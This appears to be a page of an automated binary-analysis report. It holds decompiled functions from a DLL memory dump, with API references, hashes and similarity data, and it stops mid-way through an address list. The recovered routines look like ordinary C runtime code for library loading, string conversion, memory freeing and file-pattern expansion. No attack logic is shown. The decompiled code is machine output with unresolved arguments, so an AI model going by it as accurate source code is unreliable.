String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: f5cdb3a5127aaadaefd60a890f742f5eb6d09286a2e7f22cd7a7d51a4558eef1
Instruction ID: d31ff337f4932b4049b2c787349c0571f10d29e09cdcc5be7d1a28b822a7aa68
Opcode Fuzzy Hash: f5cdb3a5127aaadaefd60a890f742f5eb6d09286a2e7f22cd7a7d51a4558eef1
Instruction Fuzzy Hash: 5E411430A00209ABCF00DFE8C848A9EBBF5BF81328F148595E8566F355D731DDA9CB84

Uniqueness

Uniqueness Score: -1.00%

Function 6EA57CEE, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EA57CEE(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x6ea93e40 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x6ea5ed10 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E6EA56487(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E6EA56487(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}

0x6ea57cf7
0x6ea57da0
0x6ea57cff
0x6ea57d01
0x6ea57d08
0x6ea57d0a
0x6ea57d0f
0x6ea57d1c
0x6ea57d31
0x6ea57d35
0x6ea57d87
0x6ea57d87
0x6ea57d8c
0x6ea57d90
0x6ea57d93
0x6ea57d93
0x6ea57d99
0x6ea57d9b
0x6ea57db2
0x6ea57dab
0x6ea57db1
0x6ea57db1
0x6ea57d9d
0x6ea57d9d
0x00000000
0x6ea57d9d
0x6ea57d37
0x6ea57d40
0x6ea57d77
0x6ea57d77
0x6ea57d79
0x6ea57d7b
0x00000000
0x00000000
0x6ea57d83
0x00000000
0x6ea57d83
0x6ea57d4a
0x6ea57d4f
0x6ea57d54
0x00000000
0x00000000
0x6ea57d5e
0x6ea57d63
0x6ea57d68
0x00000000
0x00000000
0x6ea57d6d
0x6ea57d73
0x00000000
0x6ea57d73
0x6ea57d14
0x00000000
0x00000000
0x00000000
0x6ea57d1a
0x6ea57da9
0x00000000

Strings

ext-ms-, xrefs: 6EA57D58
api-ms-, xrefs: 6EA57D44

Memory Dump Source

Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true

Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: a9cfd64c621555dfc64af9975f205a2ff2585261324095c5a08073e7ce9bfb33
Instruction ID: e712434c767afdbe88b3f8a396b38d34e8eabef58aba35fe5818cde5502aa7e5
Opcode Fuzzy Hash: a9cfd64c621555dfc64af9975f205a2ff2585261324095c5a08073e7ce9bfb33
Instruction Fuzzy Hash: 6621C673A45721BFDA518AE98C44B7A3768AF43760F258610FD15BB3C0E630DDA189E8

Uniqueness

Uniqueness Score: -1.00%

Function 6EA5ACBA, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EA5ACBA(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E6EA5AC82(_t45, 7);
					E6EA5AC82(_t45 + 0x1c, 7);
					E6EA5AC82(_t45 + 0x38, 0xc);
					E6EA5AC82(_t45 + 0x68, 0xc);
					E6EA5AC82(_t45 + 0x98, 2);
					E6EA56E13( *((intOrPtr*)(_t45 + 0xa0)));
					E6EA56E13( *((intOrPtr*)(_t45 + 0xa4)));
					E6EA56E13( *((intOrPtr*)(_t45 + 0xa8)));
					E6EA5AC82(_t45 + 0xb4, 7);
					E6EA5AC82(_t45 + 0xd0, 7);
					E6EA5AC82(_t45 + 0xec, 0xc);
					E6EA5AC82(_t45 + 0x11c, 0xc);
					E6EA5AC82(_t45 + 0x14c, 2);
					E6EA56E13( *((intOrPtr*)(_t45 + 0x154)));
					E6EA56E13( *((intOrPtr*)(_t45 + 0x158)));
					E6EA56E13( *((intOrPtr*)(_t45 + 0x15c)));
					return E6EA56E13( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x6ea5acc0
0x6ea5acc5
0x6ea5acce
0x6ea5acd9
0x6ea5ace4
0x6ea5acef
0x6ea5acfd
0x6ea5ad08
0x6ea5ad13
0x6ea5ad1e
0x6ea5ad2c
0x6ea5ad3a
0x6ea5ad4b
0x6ea5ad59
0x6ea5ad67
0x6ea5ad72
0x6ea5ad7d
0x6ea5ad88
0x00000000
0x6ea5ad98
0x6ea5ad9d

APIs

Part of subcall function 6EA5AC82: _free.LIBCMT ref: 6EA5ACA7

_free.LIBCMT ref: 6EA5AD08

Part of subcall function 6EA56E13: HeapFree.KERNEL32(00000000,00000000,?,6EA56067), ref: 6EA56E29
Part of subcall function 6EA56E13: GetLastError.KERNEL32(?,?,6EA56067), ref: 6EA56E3B

_free.LIBCMT ref: 6EA5AD13
_free.LIBCMT ref: 6EA5AD1E
_free.LIBCMT ref: 6EA5AD72
_free.LIBCMT ref: 6EA5AD7D
_free.LIBCMT ref: 6EA5AD88
_free.LIBCMT ref: 6EA5AD93

Memory Dump Source

Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true

Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 0f88698384da84cd99c7164f25d6bd77e18ebaa9143610d424fb4caa12273783
Instruction ID: 69850853050cda0cd5e8214ad40454bb31d06bf05fb64a7d5785562e09e5d2c5
Opcode Fuzzy Hash: 0f88698384da84cd99c7164f25d6bd77e18ebaa9143610d424fb4caa12273783
Instruction Fuzzy Hash: 7C119331A01704B7D670A7F0CD09FC77B9D7F40304F404C1866AB66390DB34AEB05A64

Uniqueness

Uniqueness Score: -1.00%

Function 6EA59992, Relevance: 9.2, APIs: 6, Instructions: 197
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E6EA59992(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, intOrPtr _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t41;
				signed int _t49;
				signed int _t56;
				int _t60;
				intOrPtr _t63;
				int _t64;
				int _t68;
				short* _t71;
				int _t83;
				int _t86;
				short* _t89;
				int _t91;
				signed int _t94;
				short* _t95;
				void* _t98;

				_push(__ecx);
				_push(__ecx);
				_t41 =  *0x6ea93004; // 0x90a7628e
				_v8 = _t41 ^ _t94;
				_push(__esi);
				_t91 = _a20;
				if(_t91 > 0) {
					_t68 = E6EA5AD9E(_a16, _t91);
					_t98 = _t68 - _t91;
					_t4 = _t68 + 1; // 0x1
					_t91 = _t4;
					if(_t98 >= 0) {
						_t91 = _t68;
					}
				}
				_t86 = _a32;
				if(_t86 == 0) {
					_t86 =  *( *_a4 + 8);
					_a32 = _t86;
				}
				_t83 = MultiByteToWideChar(_t86, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t91, 0, 0);
				_v12 = _t83;
				if(_t83 == 0) {
					L39:
					return E6EA53252(_v8 ^ _t94);
				} else {
					_t17 = _t83 + _t83 + 8; // 0x8
					_t75 = _t17;
					asm("sbb eax, eax");
					_t49 = _t83 + _t83 & _t17;
					if(_t49 == 0) {
						_t71 = 0;
						L15:
						if(_t71 == 0 || MultiByteToWideChar(_t86, 1, _a16, _t91, _t71, _t83) == 0) {
							L37:
							_t93 = 0;
							goto L38;
						} else {
							_t88 = _v12;
							_t93 = E6EA5804C(_t75, _t91, _a8, _a12, _t71, _v12, 0, 0, 0, 0, 0);
							if(_t93 == 0) {
								goto L37;
							}
							if((_a12 & 0x00000400) == 0) {
								_t31 = _t93 + _t93 + 8; // 0x8
								_t77 = _t31;
								asm("sbb eax, eax");
								_t56 = _t93 + _t93 & _t31;
								if(_t56 == 0) {
									_t89 = 0;
									L31:
									if(_t89 == 0 || E6EA5804C(_t77, _t93, _a8, _a12, _t71, _v12, _t89, _t93, 0, 0, 0) == 0) {
										L36:
										E6EA59972(_t89);
										goto L37;
									} else {
										_push(0);
										_push(0);
										if(_a28 != 0) {
											_push(_a28);
											_push(_a24);
										} else {
											_push(0);
											_push(0);
										}
										_t60 = WideCharToMultiByte(_a32, 0, _t89, _t93, ??, ??, ??, ??);
										_t93 = _t60;
										if(_t60 != 0) {
											E6EA59972(_t89);
											L38:
											E6EA59972(_t71);
											goto L39;
										} else {
											goto L36;
										}
									}
								}
								if(_t56 > 0x400) {
									_t89 = E6EA58C23(_t77, _t56);
									_pop(_t77);
									if(_t89 == 0) {
										goto L36;
									}
									 *_t89 = 0xdddd;
									L29:
									_t89 =  &(_t89[4]);
									goto L31;
								}
								E6EA5CFE0();
								_t89 = _t95;
								if(_t89 == 0) {
									goto L36;
								}
								 *_t89 = 0xcccc;
								goto L29;
							}
							_t63 = _a28;
							if(_t63 == 0) {
								goto L38;
							}
							if(_t93 > _t63) {
								goto L37;
							}
							_t64 = E6EA5804C(0, _t93, _a8, _a12, _t71, _t88, _a24, _t63, 0, 0, 0);
							_t93 = _t64;
							if(_t64 != 0) {
								goto L38;
							}
							goto L37;
						}
					}
					if(_t49 > 0x400) {
						_t71 = E6EA58C23(_t75, _t49);
						_pop(_t75);
						if(_t71 == 0) {
							L13:
							_t83 = _v12;
							goto L15;
						}
						 *_t71 = 0xdddd;
						L12:
						_t71 =  &(_t71[4]);
						goto L13;
					}
					E6EA5CFE0();
					_t71 = _t95;
					if(_t71 == 0) {
						goto L13;
					}
					 *_t71 = 0xcccc;
					goto L12;
				}
			}

0x6ea59997
0x6ea59998
0x6ea59999
0x6ea599a0
0x6ea599a4
0x6ea599a5
0x6ea599ab
0x6ea599b1
0x6ea599b7
0x6ea599ba
0x6ea599ba
0x6ea599bd
0x6ea599bf
0x6ea599bf
0x6ea599bd
0x6ea599c1
0x6ea599c6
0x6ea599cd
0x6ea599d0
0x6ea599d0
0x6ea599f2
0x6ea599f4
0x6ea599f9
0x6ea59b53
0x6ea59b66
0x6ea599ff
0x6ea59a02
0x6ea59a02
0x6ea59a07
0x6ea59a09
0x6ea59a0b
0x6ea59a42
0x6ea59a44
0x6ea59a46
0x6ea59b48
0x6ea59b48
0x00000000
0x6ea59a63
0x6ea59a63
0x6ea59a7a
0x6ea59a7e
0x00000000
0x00000000
0x6ea59a8c
0x6ea59ac9
0x6ea59ac9
0x6ea59ace
0x6ea59ad0
0x6ea59ad2
0x6ea59b03
0x6ea59b05
0x6ea59b07
0x6ea59b41
0x6ea59b42
0x00000000
0x6ea59b24
0x6ea59b26
0x6ea59b27
0x6ea59b2b
0x6ea59b67
0x6ea59b6a
0x6ea59b2d
0x6ea59b2d
0x6ea59b2e
0x6ea59b2e
0x6ea59b35
0x6ea59b3b
0x6ea59b3f
0x6ea59b70
0x6ea59b4a
0x6ea59b4b
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea59b3f
0x6ea59b07
0x6ea59ad6
0x6ea59af1
0x6ea59af3
0x6ea59af6
0x00000000
0x00000000
0x6ea59af8
0x6ea59afe
0x6ea59afe
0x00000000
0x6ea59afe
0x6ea59ad8
0x6ea59add
0x6ea59ae1
0x00000000
0x00000000
0x6ea59ae3
0x00000000
0x6ea59ae3
0x6ea59a8e
0x6ea59a93
0x00000000
0x00000000
0x6ea59a9b
0x00000000
0x00000000
0x6ea59ab2
0x6ea59ab7
0x6ea59abb
0x00000000
0x00000000
0x00000000
0x6ea59ac1
0x6ea59a46
0x6ea59a12
0x6ea59a2d
0x6ea59a2f
0x6ea59a32
0x6ea59a3d
0x6ea59a3d
0x00000000
0x6ea59a3d
0x6ea59a34
0x6ea59a3a
0x6ea59a3a
0x00000000
0x6ea59a3a
0x6ea59a14
0x6ea59a19
0x6ea59a1d
0x00000000
0x00000000
0x6ea59a1f
0x00000000
0x6ea59a1f

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,6EA57A69,00000000,?,?,?,6EA59BAC,?,?,00000100), ref: 6EA599EC
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000,?,?,?,6EA59BAC,?,?,00000100,5EFC4D8B,?,?), ref: 6EA59A55
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000), ref: 6EA59B35
__freea.LIBCMT ref: 6EA59B42

Part of subcall function 6EA58C23: HeapAlloc.KERNEL32(00000000,?,?,?,6EA576B7,00000220,?,?,?,?,?,?,6EA93E18,6EA55A68), ref: 6EA58C55

__freea.LIBCMT ref: 6EA59B4B
__freea.LIBCMT ref: 6EA59B70

Memory Dump Source

Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true

Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide__freea$AllocHeap
String ID:
API String ID: 3147120248-0
Opcode ID: f675d79150e86447b25c1bfe410a9dcd5c9089e616f127d89eaf6057b14112b3
Instruction ID: eac3951f094c2249541b2310fbc0ee1d009cd20f402b230bd2d4ff105ba19280
Opcode Fuzzy Hash: f675d79150e86447b25c1bfe410a9dcd5c9089e616f127d89eaf6057b14112b3
Instruction Fuzzy Hash: 5A51B3B2500206AFEB118FD4CE40EAB77AEEB45750F164529FD289F350D734DCA19668

Uniqueness

Uniqueness Score: -1.00%

Function 6EA543C6, Relevance: 9.1, APIs: 6, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E6EA543C6(void* __ecx) {
				void* _t4;
				void* _t11;
				void* _t16;
				long _t25;
				void* _t28;

				if( *0x6ea93020 != 0xffffffff) {
					_t25 = GetLastError();
					_t11 = E6EA546D7(__eflags,  *0x6ea93020);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E6EA54712(__eflags,  *0x6ea93020, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_push(1);
								_t28 = E6EA5647C(_t16);
								__eflags = _t28;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E6EA54712(__eflags,  *0x6ea93020, 0);
								} else {
									__eflags = E6EA54712(__eflags,  *0x6ea93020, _t28);
									if(__eflags != 0) {
										_t11 = _t28;
										_t28 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E6EA562C6(_t28);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t25);
					return _t11;
				} else {
					return 0;
				}
			}

0x6ea543cd
0x6ea543e0
0x6ea543e7
0x6ea543ea
0x6ea543ed
0x6ea54406
0x6ea54406
0x6ea543ef
0x6ea543ef
0x6ea543f1
0x6ea543fb
0x6ea54401
0x6ea54402
0x6ea54404
0x6ea5440b
0x6ea5440d
0x6ea54414
0x6ea54418
0x6ea5441a
0x6ea5442e
0x6ea5442e
0x6ea54437
0x6ea5441c
0x6ea5442a
0x6ea5442c
0x6ea54440
0x6ea54442
0x6ea54442
0x00000000
0x00000000
0x00000000
0x6ea5442c
0x6ea54445
0x00000000
0x00000000
0x00000000
0x6ea54404
0x6ea543f1
0x6ea5444d
0x6ea54457
0x6ea543cf
0x6ea543d1
0x6ea543d1

APIs

GetLastError.KERNEL32(00000001,?,6EA54018,6EA53854,6EA5328E,?,6EA534AB,?,00000001,?,?,00000001,?,6EA92080,0000000C,6EA5359F), ref: 6EA543D4
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6EA543E2
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6EA543FB
SetLastError.KERNEL32(00000000,6EA534AB,?,00000001,?,?,00000001,?,6EA92080,0000000C,6EA5359F,?,00000001,?), ref: 6EA5444D

Memory Dump Source

Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true

Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 6721d715c6c895c9400f0d32e66c7cfdf5572bb6c1083b8842b0fd80b3d34035
Instruction ID: e242b94e1e5fdc6557a0f2aec78d147eff6381320d7cc174e595359cc1b372eb
Opcode Fuzzy Hash: 6721d715c6c895c9400f0d32e66c7cfdf5572bb6c1083b8842b0fd80b3d34035
Instruction Fuzzy Hash: FD019C3216CB111FA70405F85E886AA2BB9EB07278321C229F1166A3E0FF314CF7520C

Uniqueness

Uniqueness Score: -1.00%

Function 6EA56E65, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E6EA56E65(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				signed int _v6;
				char _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed char _v36;
				signed char _v40;
				void* _v44;
				intOrPtr* _v72;
				intOrPtr _v104;
				intOrPtr* _v108;
				CHAR* _v112;
				signed int _v124;
				intOrPtr _v290;
				intOrPtr _v291;
				struct _WIN32_FIND_DATAA _v336;
				union _FINDEX_INFO_LEVELS _v340;
				signed int _v344;
				signed int _v348;
				intOrPtr _v448;
				intOrPtr* _t103;
				signed int _t105;
				signed int _t110;
				void* _t111;
				intOrPtr* _t121;
				intOrPtr _t123;
				intOrPtr _t124;
				void* _t128;
				intOrPtr _t130;
				void* _t135;
				signed int _t137;
				intOrPtr _t139;
				signed char _t140;
				union _FINDEX_INFO_LEVELS _t148;
				int _t153;
				signed int _t162;
				signed int _t165;
				void* _t167;
				char _t168;
				void* _t169;
				intOrPtr _t171;
				signed int _t177;
				signed int* _t178;
				signed int _t181;
				void* _t184;
				intOrPtr _t185;
				union _FINDEX_INFO_LEVELS _t186;
				intOrPtr _t189;
				signed char _t191;
				signed int _t192;
				signed int _t193;
				signed int _t195;
				intOrPtr* _t198;
				signed int _t200;
				void* _t202;
				intOrPtr* _t203;
				intOrPtr _t211;
				signed int _t218;
				intOrPtr* _t219;
				intOrPtr* _t227;
				void* _t229;
				intOrPtr _t230;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t238;
				CHAR* _t240;
				signed int _t245;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int _t251;
				intOrPtr _t252;
				void* _t253;
				signed int _t255;
				void* _t258;
				void* _t260;
				void* _t261;
				void* _t262;
				signed int _t263;
				void* _t264;
				void* _t265;

				_t103 = _a8;
				_t261 = _t260 - 0x28;
				if(_t103 != 0) {
					_t245 = _a4;
					_t181 = 0;
					 *_t103 = 0;
					_t235 = 0;
					_t191 = 0;
					_v44 = 0;
					_v40 = 0;
					_v36 = 0;
					if( *_t245 == 0) {
						L9:
						_v12 = _t181;
						_t105 = _t191 - _t235;
						_v8 = _t235;
						_t224 = (_t105 >> 2) + 1;
						_v16 = (_t105 >> 2) + 1;
						asm("sbb esi, esi");
						_t247 =  !_t245 & _t105 + 0x00000003 >> 0x00000002;
						if(_t247 != 0) {
							_t169 = _t235;
							_t233 = _t181;
							do {
								_t219 =  *_t169;
								_t17 = _t219 + 1; // 0x1
								_v20 = _t17;
								do {
									_t171 =  *_t219;
									_t219 = _t219 + 1;
								} while (_t171 != 0);
								_v12 = _v12 + 1 + _t219 - _v20;
								_t169 = _v8 + 4;
								_t233 = _t233 + 1;
								_v8 = _t169;
							} while (_t233 != _t247);
							_t224 = _v16;
						}
						_t248 = E6EA55CD4(_t224, _v12, 1);
						_t262 = _t261 + 0xc;
						if(_t248 != 0) {
							_v8 = _t235;
							_t110 = _t248 + _v16 * 4;
							_t192 = _t110;
							_v28 = _t110;
							_t111 = _t235;
							_v16 = _t192;
							if(_t235 == _v40) {
								L24:
								_v12 = _t181;
								 *_a8 = _t248;
								_t249 = _t181;
								goto L25;
							} else {
								_v336.cAlternateFileName = _t248 - _t235;
								do {
									_t121 =  *_t111;
									_t227 = _t121;
									_v24 = _t121;
									_v20 = _t227 + 1;
									do {
										_t123 =  *_t227;
										_t227 = _t227 + 1;
									} while (_t123 != 0);
									_t124 = _t227 - _v20 + 1;
									_push(_t124);
									_v20 = _t124;
									_t128 = E6EA59795(_t192, _t192, _v28 - _t192 + _v12, _v24);
									_t262 = _t262 + 0x10;
									if(_t128 != 0) {
										_push(_t181);
										_push(_t181);
										_push(_t181);
										_push(_t181);
										_push(_t181);
										E6EA56CF6();
										asm("int3");
										_t258 = _t262;
										_push(_t192);
										_t198 = _v72;
										_t65 = _t198 + 1; // 0x1
										_t229 = _t65;
										do {
											_t130 =  *_t198;
											_t198 = _t198 + 1;
										} while (_t130 != 0);
										_push(_t235);
										_t238 = _a8;
										_t200 = _t198 - _t229 + 1;
										_v12 = _t200;
										if(_t200 <=  !_t238) {
											_push(_t181);
											_t68 = _t238 + 1; // 0x1
											_t184 = _t68 + _t200;
											_t252 = E6EA56DB6(_t200, _t184, 1);
											_t202 = _t248;
											if(_t238 == 0) {
												L39:
												_push(_v12);
												_t184 = _t184 - _t238;
												_t135 = E6EA59795(_t202, _t252 + _t238, _t184, _v0);
												_t263 = _t262 + 0x10;
												if(_t135 != 0) {
													goto L45;
												} else {
													_t189 = _a12;
													_t162 = E6EA57278(_t189);
													_v12 = _t162;
													if(_t162 == 0) {
														 *((intOrPtr*)( *((intOrPtr*)(_t189 + 4)))) = _t252;
														_t255 = 0;
														 *((intOrPtr*)(_t189 + 4)) =  *((intOrPtr*)(_t189 + 4)) + 4;
													} else {
														E6EA56E13(_t252);
														_t255 = _v12;
													}
													E6EA56E13(0);
													_t165 = _t255;
													goto L44;
												}
											} else {
												_push(_t238);
												_t167 = E6EA59795(_t202, _t252, _t184, _a4);
												_t263 = _t262 + 0x10;
												if(_t167 != 0) {
													L45:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E6EA56CF6();
													asm("int3");
													_push(_t258);
													_t259 = _t263;
													_t264 = _t263 - 0x150;
													_t137 =  *0x6ea93004; // 0x90a7628e
													_v124 = _t137 ^ _t263;
													_t203 = _v108;
													_push(_t184);
													_t185 = _v104;
													_push(0);
													_t240 = _v112;
													_v448 = _t185;
													while(_t203 != _t240) {
														_t139 =  *_t203;
														if(_t139 != 0x2f && _t139 != 0x5c && _t139 != 0x3a) {
															_t203 = E6EA597E0(_t240, _t203);
															continue;
														}
														break;
													}
													_t230 =  *_t203;
													if(_t230 != 0x3a || _t203 ==  &(_t240[1])) {
														_t186 = 0;
														if(_t230 == 0x2f || _t230 == 0x5c) {
															L58:
															_t140 = 1;
														} else {
															_t140 = 0;
															if(_t230 == 0x3a) {
																goto L58;
															}
														}
														_push(_t252);
														asm("sbb eax, eax");
														_v344 =  ~(_t140 & 0x000000ff) & _t203 - _t240 + 0x00000001;
														E6EA54050(_t240,  &_v336, _t186, 0x140);
														_t265 = _t264 + 0xc;
														_t253 = FindFirstFileExA(_t240, _t186,  &_v336, _t186, _t186, _t186);
														_t148 = _v340;
														if(_t253 != 0xffffffff) {
															_v348 =  *((intOrPtr*)(_t148 + 4)) -  *_t148 >> 2;
															do {
																if(_v336.cFileName != 0x2e) {
																	L71:
																	_push(_t148);
																	_push(_v344);
																	_t148 =  &(_v336.cFileName);
																	_push(_t240);
																	_push(_t148);
																	L33();
																	_t265 = _t265 + 0x10;
																	if(_t148 != 0) {
																		goto L61;
																	} else {
																		goto L72;
																	}
																} else {
																	_t211 = _v291;
																	if(_t211 == 0 || _t211 == 0x2e && _v290 == _t186) {
																		goto L72;
																	} else {
																		goto L71;
																	}
																}
																goto L65;
																L72:
																_t153 = FindNextFileA(_t253,  &_v336);
																_t148 = _v340;
															} while (_t153 != 0);
															_t231 =  *_t148;
															_t212 = _v348;
															_t156 =  *((intOrPtr*)(_t148 + 4)) -  *_t148 >> 2;
															if(_v348 !=  *((intOrPtr*)(_t148 + 4)) -  *_t148 >> 2) {
																E6EA592A0(_t186, _t240, _t253, _t231 + _t212 * 4, _t156 - _t212, 4, E6EA56E4D);
															}
														} else {
															_push(_t148);
															_push(_t186);
															_push(_t186);
															_push(_t240);
															L33();
															L61:
															_t186 = _t148;
														}
														if(_t253 != 0xffffffff) {
															FindClose(_t253);
														}
													} else {
														_push(_t185);
														_push(0);
														_push(0);
														_push(_t240);
														L33();
													}
													L65:
													return E6EA53252(_v16 ^ _t259);
												} else {
													goto L39;
												}
											}
										} else {
											_t165 = 0xc;
											L44:
											return _t165;
										}
									} else {
										goto L23;
									}
									goto L75;
									L23:
									_t168 = _v8;
									_t218 = _v16;
									 *((intOrPtr*)(_v336.cAlternateFileName + _t168)) = _t218;
									_t111 = _t168 + 4;
									_t192 = _t218 + _v20;
									_v16 = _t192;
									_v8 = _t111;
								} while (_t111 != _v40);
								goto L24;
							}
						} else {
							_t249 = _t248 | 0xffffffff;
							_v12 = _t249;
							L25:
							E6EA56E13(_t181);
							_pop(_t193);
							goto L26;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t181;
							_t177 = E6EA597A0( *_t245,  &_v8);
							_pop(_t193);
							if(_t177 != 0) {
								_t193 =  &_v44;
								_push(_t193);
								_push(_t177);
								_push( *_t245);
								L46();
								_t261 = _t261 + 0xc;
							} else {
								_t177 =  &_v44;
								_push(_t177);
								_push(_t181);
								_push(_t181);
								_push( *_t245);
								L33();
								_t261 = _t261 + 0x10;
							}
							_v12 = _t177;
							if(_t177 != 0) {
								break;
							}
							_t245 = _t245 + 4;
							if( *_t245 != _t181) {
								continue;
							} else {
								_t235 = _v44;
								_t191 = _v40;
								goto L9;
							}
							goto L75;
						}
						_t235 = _v44;
						_t249 = _v12;
						L26:
						_v28 = _t235;
						asm("sbb ecx, ecx");
						_t195 =  !_t193 & _v40 - _t235 + 0x00000003 >> 0x00000002;
						_v336.cAlternateFileName = _t195;
						if(_t195 != 0) {
							_t251 = _v28;
							_t237 = _t195;
							do {
								E6EA56E13( *_t251);
								_t181 = _t181 + 1;
								_t251 = _t251 + 4;
							} while (_t181 != _t237);
							_t235 = _v44;
							_t249 = _v12;
						}
						E6EA56E13(_t235);
						goto L31;
					}
				} else {
					_t178 = E6EA56DA3();
					_t249 = 0x16;
					 *_t178 = _t249;
					E6EA56CE6();
					L31:
					return _t249;
				}
				L75:
			}

0x6ea56e6a
0x6ea56e6d
0x6ea56e73
0x6ea56e89
0x6ea56e8d
0x6ea56e90
0x6ea56e92
0x6ea56e94
0x6ea56e96
0x6ea56e99
0x6ea56e9c
0x6ea56ea1
0x6ea56ef2
0x6ea56ef4
0x6ea56ef7
0x6ea56ef9
0x6ea56f04
0x6ea56f0a
0x6ea56f0d
0x6ea56f11
0x6ea56f13
0x6ea56f15
0x6ea56f17
0x6ea56f19
0x6ea56f19
0x6ea56f1b
0x6ea56f1e
0x6ea56f21
0x6ea56f21
0x6ea56f23
0x6ea56f24
0x6ea56f31
0x6ea56f37
0x6ea56f3a
0x6ea56f3b
0x6ea56f3e
0x6ea56f42
0x6ea56f42
0x6ea56f50
0x6ea56f52
0x6ea56f57
0x6ea56f72
0x6ea56f75
0x6ea56f78
0x6ea56f7a
0x6ea56f7d
0x6ea56f7f
0x6ea56f85
0x6ea56fe2
0x6ea56fe5
0x6ea56fe8
0x6ea56fea
0x00000000
0x6ea56f87
0x6ea56f8b
0x6ea56f8e
0x6ea56f8e
